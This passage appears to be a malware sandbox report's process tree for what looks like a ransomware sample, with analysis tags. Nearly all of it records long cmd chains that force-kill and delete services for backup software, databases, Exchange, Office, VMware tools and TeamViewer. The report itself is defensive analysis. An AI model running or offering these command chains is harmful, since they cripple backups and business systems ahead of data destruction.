        taskkill /F /IM Veeam.Backup.Service.exe
        5⤵
        
        PID:1184
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.WmiServer.exe
        5⤵
        
        PID:1952
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM VeeamDeploymentSvc.exe
        5⤵
        
        PID:1300
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM VeeamNFSSvc.exe
        5⤵
        
        PID:1536
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM VeeamTransportSvc.exe
        5⤵
        
        PID:2256
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlbrowser.exe
        5⤵
        
        PID:2372
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlceip.exe
        5⤵
        
        PID:3020
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlservr.exe
        5⤵
        
        PID:2760
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlwriter.exe
        5⤵
        
        PID:2244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlagentc.exe
        5⤵
        
        PID:1356
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ReportingServicesService.exe
        5⤵
        
        PID:2192
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Ssms.exe
        5⤵
        
        PID:2940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fdhost.exe
        5⤵
        
        PID:2468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fdlauncher.exe
        5⤵
        Kills process with taskkill
        
        PID:1348
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MsDtsSrvr.exe
        5⤵
        
        PID:1184
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msmdsrv.exe
        5⤵
        
        PID:2272
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM mysql.exe
        5⤵
        
        PID:3036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM mysqld.exe
        5⤵
        
        PID:2560
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM w3wp.exe
        5⤵
        
        PID:2492
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wsusservice.exe
        5⤵
        
        PID:3008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM SageCSClient.exe
        5⤵
        
        PID:2480
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe
        5⤵
        
        PID:2764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Launchpad.exe
        5⤵
        
        PID:2312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dbsrv12.exe
        5⤵
        
        PID:2660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM EXCEL.EXE
        5⤵
        
        PID:2896
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM OUTLOOK.EXE
        5⤵
        
        PID:2336
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM WINWORD.EXE
        5⤵
        
        PID:2752
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM OneDrive.exe
        5⤵
        
        PID:3000
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM TaskService.exe
        5⤵
        Kills process with taskkill
        
        PID:2676
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1476
    - - C:\Windows\system32\net.exe
        
        net stop "MSOLAP$SHOPCONTROL9"
        5⤵
        
        PID:308
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        6⤵
        
        PID:1560
    - - C:\Windows\system32\net.exe
        
        net stop "MSSQL$SHOPCONTROL9"
        5⤵
        
        PID:1980
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
        6⤵
        
        PID:1144
    - - C:\Windows\system32\net.exe
        
        net stop "MSSQLFDLauncher$SHOPCONTROL9"
        5⤵
        
        PID:2024
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        6⤵
        
        PID:2100
    - - C:\Windows\system32\net.exe
        
        net stop "ReportServer$SHOPCONTROL9"
        5⤵
        
        PID:2488
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SHOPCONTROL9"
        6⤵
        
        PID:2496
    - - C:\Windows\system32\net.exe
        
        net stop "SQLAgent$SHOPCONTROL9"
        5⤵
        
        PID:2636
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHOPCONTROL9"
        6⤵
        
        PID:2704
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdateService
        7⤵
        
        PID:2844
    - - C:\Windows\system32\net.exe
        
        net stop "NetBackup Discovery Framework"
        5⤵
        
        PID:2892
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Discovery Framework"
        6⤵
        
        PID:2988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mysqld-nt.exe /F
        5⤵
        
        PID:2588
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop Realtek11nSU
        6⤵
        
        PID:2716
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM NFVPrint.exe /F
        5⤵
        
        PID:2228
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdatePatchService
        6⤵
        
        PID:2640
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop KpService
        7⤵
        
        PID:2236
    - - C:\Windows\system32\net.exe
        
        net stop "NetBackup SAN Client Fibre Transport Service"
        5⤵
        
        PID:2560
    - - C:\Windows\system32\net.exe
        
        net stop "NetBackup Proxy Service"
        5⤵
        
        PID:2276
    - - C:\Windows\system32\net.exe
        
        net stop "NetBackup Legacy Network Service"
        5⤵
        
        PID:2064
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSubmission
        6⤵
        
        PID:2808
    - - C:\Windows\system32\net.exe
        
        net stop "NetBackup Legacy Client Service"
        5⤵
        
        PID:1452
    - - C:\Windows\system32\net.exe
        
        net stop "NetBackup Client Service"
        5⤵
        
        PID:2788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM licenceserver.exe /F
        5⤵
        
        PID:400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Launchpad.exe /F
        5⤵
        
        PID:2128
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "FileZilla Server.exe"
        5⤵
        
        PID:2832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM cbService.exe
        5⤵
        
        PID:752
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM cbInterface.exe
        5⤵
        
        PID:400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM pvxwin32.exe
        5⤵
        
        PID:1216
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM pvxwin64.exe
        5⤵
        
        PID:2788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM pvxcom.exe
        5⤵
        
        PID:2504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM pvxiosvr.exe
        5⤵
        
        PID:1560
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Sage.NA.AT_AU.SysTray.exe
        5⤵
        
        PID:2512
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Sage.NA.AT_AU.Service.exe
        5⤵
        
        PID:1656
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:952
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        5⤵
        
        PID:2448
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F
        5⤵
        
        PID:2376
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Tomcat7w.exe /F
        5⤵
        
        PID:1288
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Launchpad.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mpdwsvc.exe /F
        5⤵
        
        PID:2848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cbVSCService11.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2248
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cbService.exe /F
        5⤵
        
        PID:1636
    - - C:\Windows\system32\sc.exe
        
        sc delete CobianBackup11
        5⤵
        
        PID:2780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mysqld-nt.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2272
    - - C:\Windows\system32\sc.exe
        
        sc delete cbVSCService11
        5⤵
        
        PID:2820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F
        5⤵
        
        PID:2792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sqlceip.exe /F
        5⤵
        
        PID:2660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F
        5⤵
        
        PID:1588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM store.exe
        5⤵
        
        PID:2104
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MSExchangeMailboxReplication.exe
        5⤵
        
        PID:2564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe
        5⤵
        
        PID:2276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MSExchangeThrottling.exe
        5⤵
        
        PID:2868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM EdgeTransport.exe
        5⤵
        
        PID:2404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MSExchangeTransportLogSearch.exe
        5⤵
        Kills process with taskkill
        
        PID:1216
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe
        5⤵
        
        PID:2424
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe
        5⤵
        
        PID:2136
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM DataCollectorSvc.exe
        5⤵
        
        PID:2440
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.ServiceHost.exe
        5⤵
        
        PID:2488
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe
        5⤵
        
        PID:2772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MSExchangeMailboxAssistants.exe
        5⤵
        
        PID:1968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msexchangerepl.exe
        5⤵
        Kills process with taskkill
        
        PID:524
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe
        5⤵
        
        PID:3028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe
        5⤵
        
        PID:3048
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MsExchangeFDS.exe
        5⤵
        
        PID:2500
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MSExchangeMailSubmission.exe
        5⤵
        
        PID:2468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM MSExchangeTransport.exe
        5⤵
        
        PID:1472
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe
        5⤵
        
        PID:1356
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowEngine"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:996
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DDSoftPwsTomcat9.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM U8SmartClient.exe /F
        5⤵
        
        PID:2820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM U8SmartClientMonitor.exe /F
        5⤵
        
        PID:3000
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM tomcat9.exe /F
        5⤵
        
        PID:2532
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SqlManagement.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ReportingServicesService.exe /F
        5⤵
        
        PID:2016
    - - C:\Windows\system32\sc.exe
        
        sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"
        5⤵
        
        PID:2632
    - - C:\Windows\system32\sc.exe
        
        sc delete "ReportServer$SQLEXPRESS"
        5⤵
        
        PID:2696
    - - C:\Windows\system32\sc.exe
        
        sc delete TongBackupSrv
        5⤵
        
        PID:2480
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TongBackupSrv.exe /F
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UFMsgCenterService.exe /F
        5⤵
        
        PID:2392
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "Cobian.exe" /F
        5⤵
        
        PID:2308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "SAP Business One.exe" /F
        5⤵
        
        PID:2484
    - - C:\Windows\system32\net.exe
        
        net stop "SQLBackupAndFTP Client Service"
        5⤵
        
        PID:752
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBackupAndFTP Client Service"
        6⤵
        
        PID:2968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "SqlBak.Service.exe" /F
        5⤵
        
        PID:324
    - - C:\Windows\system32\net.exe
        
        net stop cbVSCService
        5⤵
        
        PID:2016
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop cbVSCService
        6⤵
        
        PID:2912
    - - C:\Windows\system32\net.exe
        
        net stop "SAP Business One RSP Agent Service"
        5⤵
        
        PID:2772
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAP Business One RSP Agent Service"
        6⤵
        
        PID:1056
    - - C:\Windows\system32\net.exe
        
        net stop SAPB1iDIProxy
        5⤵
        
        PID:2304
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SAPB1iDIProxy
        6⤵
        
        PID:2820
    - - C:\Windows\system32\net.exe
        
        net stop "SAPB1iDIProxy_Monitor"
        5⤵
        
        PID:3032
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAPB1iDIProxy_Monitor"
        6⤵
        
        PID:2232
    - - C:\Windows\system32\net.exe
        
        net stop SAPB1iEventSender
        5⤵
        
        PID:2808
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SAPB1iEventSender
        6⤵
        
        PID:1816
    - - C:\Windows\system32\net.exe
        
        net stop SBOClientAgent
        5⤵
        
        PID:1068
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SBOClientAgent
        6⤵
        
        PID:2584
    - - C:\Windows\system32\net.exe
        
        net stop SBODI_Server
        5⤵
        
        PID:2836
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SBODI_Server
        6⤵
        
        PID:2768
    - - C:\Windows\system32\net.exe
        
        net stop SBOJobServiceBackEnd
        5⤵
        
        PID:2056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SBOJobServiceBackEnd
        6⤵
        
        PID:2416
    - - C:\Windows\system32\net.exe
        
        net stop SBOMail
        5⤵
        
        PID:2420
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SBOMail
        6⤵
        
        PID:2956
    - - C:\Windows\system32\net.exe
        
        net stop SBOWFDataAccess
        5⤵
        
        PID:1356
    - - C:\Windows\system32\net.exe
        
        net stop SBOWorkflowEngine
        5⤵
        
        PID:1212
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\system32\sc.exe
        
        sc delete "XT800Service_Personal"
        5⤵
        
        PID:1184
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLSERVERAGENT
        5⤵
        
        PID:1788
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLWriter
        5⤵
        
        PID:1724
    - - C:\Windows\system32\sc.exe
        
        sc delete MSSQLSERVER
        5⤵
        
        PID:2260
    - - C:\Windows\system32\sc.exe
        
        sc delete QcSoftService
        5⤵
        
        PID:2504
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
        6⤵
        
        PID:2620
    - - C:\Windows\system32\sc.exe
        
        sc delete MSSQLFDLauncher
        5⤵
        
        PID:1660
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLBrowser
        5⤵
        
        PID:1020
    - - C:\Windows\system32\sc.exe
        
        sc delete MSDTC
        5⤵
        
        PID:2060
    - - C:\Windows\system32\sc.exe
        
        sc delete ReportServer
        5⤵
        
        PID:2512
    - - C:\Windows\system32\sc.exe
        
        sc delete "AHS SERVICE"
        5⤵
        
        PID:2828
    - - C:\Windows\system32\sc.exe
        
        sc delete "Sense Shield Service"
        5⤵
        
        PID:2988
    - - C:\Windows\system32\sc.exe
        
        sc delete RabbitMQ
        5⤵
        
        PID:2684
    - - C:\Windows\system32\sc.exe
        
        sc delete SSMonitorService
        5⤵
        
        PID:1688
    - - C:\Windows\system32\sc.exe
        
        sc delete MSSQL$SQL2008
        5⤵
        
        PID:2488
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLAgent$SQL2008
        5⤵
        
        PID:2592
    - - C:\Windows\system32\sc.exe
        
        sc delete TPlusStdUpgradeService1300
        5⤵
        
        PID:2816
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHM
        6⤵
        
        PID:2812
    - - C:\Windows\system32\sc.exe
        
        sc delete jhi_service
        5⤵
        
        PID:3020
    - - C:\Windows\system32\sc.exe
        
        sc delete VirboxWebServer
        5⤵
        
        PID:2832
    - - C:\Windows\system32\sc.exe
        
        sc delete LMS
        5⤵
        
        PID:2520
    - - C:\Windows\system32\sc.exe
        
        sc delete TPlusStdTaskService1300
        5⤵
        
        PID:2796
    - - C:\Windows\system32\sc.exe
        
        sc delete "FontCache3.0.0.0"
        5⤵
        
        PID:2548
    - - C:\Windows\system32\sc.exe
        
        sc delete TPlusStdAppService1300
        5⤵
        
        PID:2196
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeADTopology
        6⤵
        
        PID:2372
    - - C:\Windows\system32\sc.exe
        
        sc delete SSSyncService
        5⤵
        
        PID:340
    - - C:\Windows\system32\sc.exe
        
        sc delete TeamViewer
        5⤵
        
        PID:2392
    - - C:\Windows\system32\sc.exe
        
        sc delete "OSP Service"
        5⤵
        
        PID:2992
    - - C:\Windows\system32\sc.exe
        
        sc delete VGAuthService
        5⤵
        
        PID:2980
    - - C:\Windows\system32\sc.exe
        
        sc delete VMTools
        5⤵
        
        PID:2760
    - - C:\Windows\system32\sc.exe
        
        sc delete MSSQLServerOLAPService
        5⤵
        
        PID:2644
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
      4⤵
      PID:1396
    - - C:\Windows\system32\sc.exe
        
        sc delete "DAService_TCP"
        5⤵
        
        PID:936
    - - C:\Windows\system32\sc.exe
        
        sc delete "eCard-TTransServer"
        5⤵
        
        PID:620
    - - C:\Windows\system32\sc.exe
        
        sc delete EnergyDataService
        5⤵
        
        PID:1688
    - - C:\Windows\system32\sc.exe
        
        sc delete UI0Detect
        5⤵
        
        PID:2300
    - - C:\Windows\system32\sc.exe
        
        sc delete K3MobileService
        5⤵
        
        PID:2468
    - - C:\Windows\system32\sc.exe
        
        sc delete eCardMPService
        5⤵
        
        PID:324
    - - C:\Windows\system32\sc.exe
        
        sc delete UIODetect
        5⤵
        
        PID:2868
    - - C:\Windows\system32\sc.exe
        
        sc delete VMUSBArbService
        5⤵
        
        PID:2024
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop QPCore
        6⤵
        
        PID:2392
    - - C:\Windows\system32\sc.exe
        
        sc delete OpenSSHd
        5⤵
        
        PID:2960
    - - C:\Windows\system32\sc.exe
        
        sc delete VmAgentDaemon
        5⤵
        
        PID:2804
    - - C:\Windows\system32\sc.exe
        
        sc delete eSightService
        5⤵
        
        PID:3020
    - - C:\Windows\system32\sc.exe
        
        sc delete Jenkins
        5⤵
        
        PID:2476
    - - C:\Windows\system32\sc.exe
        
        sc delete SQLTELEMETRY
        5⤵
        
        PID:2580
    - - C:\Windows\system32\sc.exe
        
        sc delete zyb_sync
        5⤵
        
        PID:2416
    - - C:\Windows\system32\sc.exe
        
        sc delete smtpsvrJT
        5⤵
        
        PID:1052
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSComplianceAudit
        6⤵
        
        PID:2320
    - - C:\Windows\system32\sc.exe
        
        sc delete 360EntHttpServer
        5⤵
        
        PID:2680
    - - C:\Windows\system32\sc.exe
        
        sc delete MSMQ
        5⤵
        
        PID:2568
    - - C:\Windows\system32\sc.exe
        
        sc delete secbizsrv
        5⤵
        
        PID:2512
    - - C:\Windows\system32\sc.exe
        
        sc delete apachezt
        5⤵
        
        PID:2256
    - - C:\Windows\system32\sc.exe
        
        sc delete 360EntSvc
        5⤵
        
        PID:2676
    - - C:\Windows\system32\sc.exe
        
        sc delete "vm-agent"
        5⤵
        
        PID:2636
    - - C:\Windows\system32\sc.exe
        
        sc delete VMwareHostd
        5⤵
        
        PID:2496
    - - C:\Windows\system32\sc.exe
        
        sc delete 360EntClientSvc
        5⤵
        
        PID:2304
    - - C:\Windows\system32\sc.exe
        
        sc delete VMAuthdService
        5⤵
        
        PID:2084
    - - C:\Windows\system32\sc.exe
        
        sc delete NFWebServer
        5⤵
        
        PID:536
    - - C:\Windows\system32\sc.exe
        
        sc delete "wanxiao-monitor"
        5⤵
        
        PID:3020
    - - C:\Windows\system32\sc.exe
        
        sc delete wampapache
        5⤵
        
        PID:2220
    - - C:\Windows\system32\sc.exe
        
        sc delete WebAttendServer
        5⤵
        
        PID:2772
    - - C:\Windows\system32\sc.exe
        
        sc delete MSSEARCH
        5⤵
        
        PID:2468
    - - C:\Windows\system32\sc.exe
        
        sc delete TCPIDDAService
        5⤵
        
        PID:2628
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleJobSchedulerORCL
        5⤵
        
        PID:2136
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleMTSRecoveryService
        5⤵
        
        PID:2320
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleDBConcoleorcl
        5⤵
        
        PID:2888
    - - C:\Windows\system32\sc.exe
        
        sc delete "SyncBASE Service"
        5⤵
        
        PID:2692
    - - C:\Windows\system32\sc.exe
        
        sc delete msftesql
        5⤵
        
        PID:2824
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
      4⤵
      PID:1300
    - - C:\Windows\system32\sc.exe
        
        sc delete OracleVssWriterORCL
        5⤵
        
        PID:2556
    - - C:\Windows\system32\sc.exe
        
